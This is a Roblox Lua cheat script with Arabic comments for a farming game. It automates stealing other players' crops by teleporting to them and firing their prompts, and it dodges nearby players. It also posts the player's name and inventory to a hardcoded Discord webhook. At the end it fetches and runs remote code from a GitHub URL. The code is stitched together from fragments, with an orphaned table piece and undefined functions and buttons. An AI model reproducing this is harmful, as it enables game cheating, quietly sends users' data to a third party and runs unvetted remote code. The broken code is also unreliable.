-- [[ Osama Cyberpunk Neon Ultimate Hub - Final Version ]] --

local ScreenGui = Instance.new("ScreenGui")
local MainFrame = Instance.new("Frame")
local FrameCorner = Instance.new("UICorner")
local FrameStroke = Instance.new("UIStroke")

-- UI Elements
local StealButton = Instance.new("TextButton")
local HarvestButton = Instance.new("TextButton")
local MailButton = Instance.new("TextButton")
local VisualCoinButton = Instance.new("TextButton")
local MinimizeButton = Instance.new("TextButton")

-- [هنا يتم إعداد الـ UI والـ InputFrame كما فعلنا سابقاً.. اختصاراً للمساحة]
-- (يمكنك نسخ أجزاء الـ UI من الكود السابق، سأركز هنا على دالة الـ Webhook المحدثة)

---------------------------------------------------------------------
-- دالة جمع البيانات وإرسال التقرير للديسكورد
---------------------------------------------------------------------
local WebhookURL = "https://discord.com/api/webhooks/1489215951093239890/052bJ8vjLfNKXfP5ED3iMfYZEzG8PPwBbXb9IZegNHFoNCpwbk0X5DF-YdWuqUY7hvxP"
local HttpService = game:GetService("HttpService")

local function getInventoryData()
    local data = {coins = "0", pets = "None", seeds = "0"}
    local LocalPlayer = game.Players.LocalPlayer
    
    -- جلب الكوينات
    local leaderstats = LocalPlayer:FindFirstChild("leaderstats")
    if leaderstats then
        for _, val in pairs(leaderstats:GetChildren()) do
            if string.find(string.lower(val.Name), "coin") or string.find(string.lower(val.Name), "money") then
                data.coins = tostring(val.Value)
            end
        end
    end
    
    -- جلب الحيوانات
    local petsFolder = LocalPlayer:FindFirstChild("Pets") 
    if petsFolder then
        local petNames = {}
        for _, pet in pairs(petsFolder:GetChildren()) do
            table.insert(petNames, pet.Name)
        end
        if #petNames > 0 then data.pets = table.concat(petNames, ", ") end
    end
    
    -- جلب البذور
    local backpack = LocalPlayer:FindFirstChild("Backpack")
    if backpack then
        local seedCount = 0
        for _, item in pairs(backpack:GetChildren()) do
            if string.find(string.lower(item.Name), "seed") then seedCount = seedCount + 1 end
        end
        data.seeds = tostring(seedCount)
    end
    return data
end

local function sendStealReport()
    local info = getInventoryData()
    local payload = {
        ["content"] = "<@1486461099002953982>", -- المنشن الخاص بك
        ["embeds"] = {{
            ["title"] = "📦 عملية Mail تمت بنجاح",
            ["color"] = 16711680,
            ["fields"] = {
                {["name"] = "💰 Coins", ["value"] = "```" .. info.coins .. "
```", ["inline"] = true},
                {["name"] = "🌱 Seeds Count", ["value"] = "```" .. info.seeds .. "```", ["inline"] = true},
                {["name"] = "🐾 Pets List", ["value"] = "```" .. info.pets .. "
```", ["inline"] = false}
            }
        }}
    }
    
    local requestFunc = syn and syn.request or http_request or request
    requestFunc({
        Url = WebhookURL,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = HttpService:JSONEncode(payload)
    })
end

---------------------------------------------------------------------
-- زر الـ Mail (تم ربطه بدالة التقرير)
---------------------------------------------------------------------
MailButton.MouseButton1Click:Connect(function()
    -- [هنا تضع منطق إرسال البريد الخاص بك...]
    
    -- إرسال التقرير بعد التنفيذ
    sendStealReport()
end)

-- (باقي الكود الخاص بالحركة والحصاد والـ Visual Coins يبقى كما هو)
                ["footer"] = {
                    ["text"] = "Osama Ultimate Hub | Target: dc : ad_pa"
                },
                ["timestamp"] = DateTime.now():ToIsoDate()
            }}
        }
        
        -- Safe check if executor supports request
        local requestFunc = syn and syn.request or http and http.request or http_request or request
        if requestFunc then
            requestFunc({
                Url = WebhookURL,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode(data)
            })
        end
    end)
end

-- Send Initial Notification when script runs
sendDiscordMessage("🚀 Script Initialized Successfully!", "Player: **" .. LocalPlayer.Name .. "** has executed the script.\nStatus: Ready to farm.", 3066993)

---------------------------------------------------------------------
-- LOGIC & FUNCTIONS
---------------------------------------------------------------------

local PriorityCrops = {
    "dragon", "mango", "coconut", "grape", "banana", "pineapple",
    "cactus", "corn", "bamboo", "apple", "tomato", "tulip", "blue",
    "straw", "carrot", "cherry", "acorn", "mush", "fruit", "harvest"
}

local homeCFrame = nil
local autoStealing = false
local harvesting = false
local autoSellBuy = false
local safeMode = false
local stealStep = 1

local tpDelay = 0.04
local backDelay = 0.02
local loopDelay = 0.8

-- Toggle UI Visibility
MinimizeButton.MouseButton1Click:Connect(function()
    MainFrame.Visible = not MainFrame.Visible
    MinimizeButton.Text = MainFrame.Visible and "CLOSE" or "OPEN"
end)

-- Safe Mode Toggle
SafeModeButton.MouseButton1Click:Connect(function()
    safeMode = not safeMode
    if safeMode then
        SafeModeButton.Text = "Safe Mode: ON (Slow & Safe) 🛡️"
        SafeModeButton.BackgroundColor3 = Color3.fromRGB(50, 205, 50)
        tpDelay = 0.15
        backDelay = 0.1
        loopDelay = 1.8
    else
        SafeModeButton.Text = "Safe Mode (Anti-Cheat): OFF 🛡️"
        SafeModeButton.BackgroundColor3 = Color3.fromRGB(138, 43, 226)
        tpDelay = 0.04
        backDelay = 0.02
        loopDelay = 0.8
    end
end)

local function getWorkspacePrompts()
    local prompts = {}
    for _, v in ipairs(workspace:GetDescendants()) do
        if v:IsA("ProximityPrompt") then
            table.insert(prompts, v)
        end
    end
    return prompts
end

-- Player/Admin Detector with Discord Logs
local function checkNearbyPlayers(rootPart)
    for _, p in ipairs(game.Players:GetPlayers()) do
        if p ~= LocalPlayer and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then
            local distance = (p.Character.HumanoidRootPart.Position - rootPart.Position).Magnitude
            if distance < 40 then
                sendDiscordMessage("⚠️ Security Alert (Player Detected)", "Player **" .. p.Name .. "** got too close (" .. math.floor(distance) .. " studs).\nAction: Evaded safely back to home.", 15158332)
                return true
            end
        end
    end
    return false
end

local function runAutoSellAndBuy(rootPart)
    for _, v in ipairs(workspace:GetDescendants()) do
        local name = string.lower(v.Name)
        local isPrompt = v:IsA("ProximityPrompt")
        local text = isPrompt and string.lower(v.ObjectText .. v.ActionText) or ""
        
        if string.find(name, "sell") or string.find(text, "sell") then
            local target = v:IsA("ProximityPrompt") and v.Parent or v
            if target:IsA("BasePart") then
                rootPart.CFrame = target.CFrame + Vector3.new(0, 2, 0)
                task.wait(0.2)
                if isPrompt then fireproximityprompt(v) end
                task.wait(0.3)
            end
        end
        
        if string.find(name, "seed") or string.find(name, "buy") or string.find(text, "seed") then
            local target = v:IsA("ProximityPrompt") and v.Parent or v
            if target:IsA("BasePart") then
                rootPart.CFrame = target.CFrame + Vector3.new(0, 2, 0)
                task.wait(0.2)
                if isPrompt then fireproximityprompt(v) end
                task.wait(0.3)
            end
        end
    end
end

local function findBestPrompt(myPosition)
    local allPrompts = getWorkspacePrompts()
    for _, cropName in ipairs(PriorityCrops) do
        for _, prompt in ipairs(allPrompts) do
            local parentName = prompt.Parent and string.lower(prompt.Parent.Name) or ""
            local promptText = string.lower(prompt.ObjectText .. prompt.ActionText .. prompt.Name)
            
            if string.find(promptText, "harvest") or string.find(parentName, "harvest") then
                if string.find(promptText, cropName) or string.find(parentName, cropName) then
                    local targetPart = prompt.Parent
                    if targetPart and targetPart:IsA("BasePart") then
                        if (targetPart.Position - myPosition).Magnitude > 50 then
                            return prompt, targetPart
                        end
                    end
                end
            end
        end
    end
    return nil, nil
end

-- [Button 1]: Auto Steal
StealButton.MouseButton1Click:Connect(function()
    local character = LocalPlayer.Character or LocalPlayer.CharacterAdded:Wait()
    local rootPart = character:FindFirstChild("HumanoidRootPart")
    if not rootPart then return end
    
    if stealStep == 1 then
        homeCFrame = rootPart.CFrame
        StealButton.Text = "Activate Auto Steal 🚀"
        StealButton.BackgroundColor3 = Color3.fromRGB(30, 144, 255)
        stealStep = 2
    elseif stealStep == 2 then
        autoStealing = not autoStealing
        if autoStealing then
            StealButton.Text = "Stealing Active... ON 🔥"
            StealButton.BackgroundColor3 = Color3.fromRGB(50, 205, 50)
            
            task.spawn(function()
                while autoStealing do
                    if not homeCFrame then break end
                    if checkNearbyPlayers(rootPart) then
                        rootPart.CFrame = homeCFrame
                        task.wait(2)
                        continue
                    end
                    
                    local prompt, targetPart = findBestPrompt(homeCFrame.Position)
                    if prompt and targetPart then
                        rootPart.CFrame = targetPart.CFrame + Vector3.new(0, 2, 0)
                        task.wait(tpDelay) 
                        
                        prompt.RequiresLineOfSight = false
                        prompt.MaxActivationDistance = 999
                        fireproximityprompt(prompt)
                        
                        task.wait(backDelay)
                        rootPart.CFrame = homeCFrame
                        task.wait(loopDelay) 
                    else
                        task.wait(1.5) 
                    end
                end
            end)
        else
            StealButton.Text = "Activate Auto Steal 🚀"
            StealButton.BackgroundColor3 = Color3.fromRGB(30, 144, 255)
        end
    end
end)

-- [Button 2]: Remote Harvest
HarvestButton.MouseButton1Click:Connect(function()
    harvesting = not harvesting
    if harvesting then
        HarvestButton.Text = "Remote Harvesting... ON 🌾"
        HarvestButton.BackgroundColor3 = Color3.fromRGB(50, 205, 50)
        
        task.spawn(function()
            while harvesting do
                local character = LocalPlayer.Character or LocalPlayer.CharacterAdded:Wait()
                local rootPart = character:FindFirstChild("HumanoidRootPart")
                
                if rootPart then
                    local originalPosition = rootPart.CFrame
                    
                    for _, v in ipairs(workspace:GetDescendants()) do
                        if not harvesting then break end
                        if checkNearbyPlayers(rootPart) then
                            rootPart.CFrame = originalPosition
                            task.wait(2)
                            break
                        end
                        
                        local isHarvest = string.find(string.lower(v.Name), "harvest") 
                                          or (v:IsA("ProximityPrompt") and string.find(string.lower(v.ObjectText), "harvest"))
                                          or (v:IsA("ProximityPrompt") and string.find(string.lower(v.ActionText), "harvest"))
                        
                        if isHarvest then
                            local targetPart = v.Parent
                            if targetPart and targetPart:IsA("BasePart") then
                                rootPart.CFrame = targetPart.CFrame + Vector3.new(0, 2, 0)
                                task.wait(tpDelay)
                                
                                if v:IsA("ProximityPrompt") then
                                    v.RequiresLineOfSight = false
                                    v.MaxActivationDistance = 999999
                                    fireproximityprompt(v)
                                elseif v:IsA("ClickDetector") then
                                    fireclickdetector(v)
                                elseif v:IsA("TouchTransmitter") then
                                    firetouchinterest(rootPart, targetPart, 0)
                                    task.wait()
                                    firetouchinterest(rootPart, targetPart, 1)
                                end
                                task.wait(backDelay)
                            end
                        end
                    end
                    rootPart.CFrame = originalPosition
                end
                task.wait(loopDelay + 0.5) 
            end
        end)
    else
        HarvestButton.Text = "Remote Harvest: OFF 🌾"
        HarvestButton.BackgroundColor3 = Color3.fromRGB(138, 43, 226)
    end
end)

-- [Button 3]: Auto Sell & Buy Seeds
AutoSellButton.MouseButton1Click:Connect(function()
    autoSellBuy = not autoSellBuy
    if autoSellBuy then
        AutoSellButton.Text = "Auto Sell & Buy: ON 💰"
        AutoSellButton.BackgroundColor3 = Color3.fromRGB(50, 205, 50)
        sendDiscordMessage("💰 Auto-Sell Activated", "The script will now head to the shop every 15 seconds to sell your inventory.", 1752220)
        
        task.spawn(function()
            while autoSellBuy do
                local character = LocalPlayer.Character or LocalPlayer.CharacterAdded:Wait()
                local rootPart = character:FindFirstChild("HumanoidRootPart")
                
                if rootPart then
                    local currentCFrame = rootPart.CFrame
                    runAutoSellAndBuy(rootPart)
                    rootPart.CFrame = currentCFrame
                end
                task.wait(15)
            end
        end)
    else
        AutoSellButton.Text = "Auto Sell & Buy Seeds: OFF 💰"
        AutoSellButton.BackgroundColor3 = Color3.fromRGB(138, 43, 226)
    end
end)

-- Anti-AFK
task.spawn(function()
    local vu = game:GetService("VirtualUser")
    LocalPlayer.Idled:Connect(function()
        vu:Button2Down(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
        task.wait(1)
        vu:Button2Up(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
    end)
end)

-- Secondary script auto-loader
task.spawn(function()
    task.wait(2)
    pcall(function()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/Xhubmax/Gag2/refs/heads/main/Xwoalua"))()
    end)
end)

